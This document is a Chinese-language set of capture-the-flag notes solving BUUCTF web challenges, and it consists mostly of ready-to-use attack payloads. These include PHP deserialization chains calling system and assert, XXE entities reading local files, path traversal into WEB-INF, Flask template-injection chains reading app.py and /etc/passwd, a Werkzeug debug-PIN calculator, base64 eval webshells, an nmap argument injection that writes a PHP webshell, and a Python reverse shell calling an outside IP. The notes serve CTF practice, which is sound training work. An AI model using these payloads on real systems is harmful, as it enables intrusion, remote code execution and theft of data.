(反序列化)[网鼎杯 2020 青龙组]AreUSerialz
- O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"laolao";}
知识点:
- protected绕过:php7.1+版本对属性类型不敏感,所以本地序列化就直接用public就可以绕过
- Linux下Apache目录明细
(XXE)[网鼎杯 2020 青龙组]filejava
- 读取WEB-XML:?filename=./../../../../WEB-INF/web.xml
- 下载class:
- ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/UploadServlet.class
- ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
- ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
- 查看源码,然后走xee
- 选择Buu basic中的“Linux Labs”,ifconfig查看一下本机ip,在“/var/www/html”目录里写一份的dtd,url填的是 本机ip+自己设定的等会要监听的端口号,nc开启监听
- 新建一份excel文档,后缀名改成“zip”,解压缩后可以看到一个叫 “[Content_Types].xml” 的文件,打开这份文件,添加一条代码,用来引用外部dtd实体,编辑好了再压缩回去,把后缀改回“xlsx”,选择文件上传,就可以在内网的这台机子上发现flag
- 注意:命名格式-->"excel-***.xlsx"
知识点:
(PHP弱类型绕过)[MRCTF2020]Ez_bypass
——哎,真是纯真时代的美好题型
- get:?gg[]=1&id[]=0
- post:passwd=1234567a
(XXE)[NCTF2019]Fake XML cookbook
<?xml version = "1.0" encoding = "utf-8"?> <!DOCTYPE hack [<!ENTITY lao SYSTEM "file:///flag">]> <user><username>&lao;</username><password>123</password></user>
知识点:
- 从XML相关一步一步到XXE漏洞
- DTD 教程
- XML 系列教程
- <!ENTITY lao SYSTEM "file:///flag">:声明一个外部实体。实体名:lao,实体内容:"file:///flag"的值,来自本地计算机:SYSTEM
- &lao;:引用这个实体
- <!DOCTYPE hack :定义此文为hack类型
- 外部实体支持的协议:
(反序列+脑洞)[网鼎杯 2020 朱雀组]phpweb
- func=readfile&p=index.php
<?php class Test { public $p = "ls /tmp"; public $func = "system"; } $b=new Test(); $a=serialize($b); echo $a;
- func=unserialize&p=O:4:"Test":2:{s:1:"p";s:7:"ls /tmp";s:4:"func";s:6:"system";}
- func=readfile&p=/tmp/flagoefiu4r93
(脑洞)[MRCTF2020]PYWebsite
- 头部添加:X-Forwarded-For:127.0.0.1
(反序列化)[NPUCTF2020]ReadlezPHP
- flag在phpinfo()里面
<?php error_reporting(1); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this->a; $b = $this->b; echo $b($a); } } $t = new HelloPhp(); $t->b = 'assert'; $t->a = 'phpinfo();'; echo urlencode(serialize($t)); ?>
(Json)[FBCTF2019]RCEService
- ?cmd={ %0A "cmd":"/bin/cat /home/rceservice/flag jail" %0A}
- preg_match()函数只能匹配第一行数据,可以使用换行符%0a绕过
(CMS)[GKCTF2020]老八小超市儿
- 直接百度ShopXO的漏洞
- admin.php用默认密码登进去(admin shopxo)
- 应用商城下载默认主题,把自己的马加进去,然后上传连马
- http://4f0630d6-cac1-4165-827a-407050333901.node3.buuoj.cn/public/static/index/default/lao.php
- 红色的auto.sh每60s执行一个python程序
- /var/mail/makeflaghint.py
- 进去修改代码,读取/roo/flag到flag.hint里面
[GKCTF2020]cve版签到
- ?url=http://127.0.0.123%00.ctfhub.com
(PHP禁用函数绕过)[GKCTF2020]CheckIN
漏洞:php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令影响范围是linux,php7.0-7.3
- ?Ginkgo=cGhwaW5mbygpOw==
- 蚁剑连接:?Ginkgo=ZXZhbCgkX1BPU1RbJ2xhbyddKTs= ,密码:lao
- 在/tmp目录上传exp(pwn('/readflag‘)
- ?Ginkgo=dmFyX2R1bXAoaW5jbHVkZSgnL3RtcC9sYWppLnBocCcpKTs=
(PHP取反|异或绕过)[极客大挑战 2019]RCE ME
- ?code=(~%8F%97%8F%96%91%99%90)();
- 传一句话蚁剑连接,使用插件“绕过disable_functions”
- 关于PHP正则的一些绕过方法
- bypass_disable_functions
(ssti,Flask)[GYCTF2020]FlaskApp
绕过
#1.读源码 {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }} {% endif %} {% endfor %} #2.遍历根目录 {{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}} #3.getflag {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }} {% endif %} {% endfor %}
pin
# {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}} # flaskweb # {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/sys/class/net/eth0/address').read()}} # 02:42:ae:01:f0:45=2485410459717 # {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/proc/self/cgroup').read()}} # docker机器id b1dea45d61a2c105caf3b988cad9553d5467ffd8d9c81521e7a71514d6a333e2 import hashlib from itertools import chain probably_public_bits = [ 'flaskweb', 'flask.app', 'Flask', '/usr/local/lib/python3.7/site-packages/flask/app.py', ] private_bits = [ '2485410459717', 'b1dea45d61a2c105caf3b988cad9553d5467ffd8d9c81521e7a71514d6a333e2' ] h = hashlib.md5() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance(bit, str): bit = bit.encode('utf-8') h.update(bit) h.update(b'cookiesalt') cookie_name = '__wzd' + h.hexdigest()[:20] num = None if num is None: h.update(b'pinsalt') num = ('%09d' % int(h.hexdigest(), 16))[:9] rv =None if rv is None: for group_size in 5, 4, 3: if len(num) % group_size == 0: rv = '-'.join(num[x:x + group_size].rjust(group_size, '0') for x in range(0, len(num), group_size)) break else: rv = num print(rv) # PIN:436-259-020
(nmap命令行参数注入)[网鼎杯 2020 朱雀组]Nmap
- ' <?= @eval($_POST["pd"]);?> -oG pd.phtml '
(水题)[BSidesCF 2019]Futurella
- 右键看源码
(flask+反弹连接)[V&N2020 公开赛]CHECKIN
- https://www.zhaoj.in/read-6407.html
- 【Linux恢复误删除的文件或者目录】
- 【反弹shell payload总结 】
# 反弹shell,然后再/proc里找fd ?c=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("174.1.245.102",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'